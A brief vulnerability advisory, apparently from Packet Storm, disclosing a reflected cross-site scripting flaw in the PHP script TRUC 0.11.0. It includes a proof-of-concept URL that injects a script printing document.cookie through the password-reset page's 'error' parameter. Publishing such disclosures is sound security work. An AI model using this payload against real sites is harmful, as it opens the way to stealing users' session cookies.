TRUC version 0.11.0 suffers from a cross site scripting vulnerability.
b979c8b112cffe784beb90cc93635e35==============================================================================
[»] TRUC 0.11.0 XSS Vulnerability
==============================================================================
[»] Script: [TRUC 0.11.0]
[»] Language: [ PHP ]
[»] Download: http://sec-war.com/up//uploads/files/domain-2c57be85d5.rar
[»] Founder: [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
[»] Greetz to:[ sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]
###########################################################################
===[ Exploit ]===
[»]http://localhost/truc/login_reset_password_page.php?failed=true&error="><script>alert(document.cookie);</script>
[»]Author: Snakespc <-
###########################################################################
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!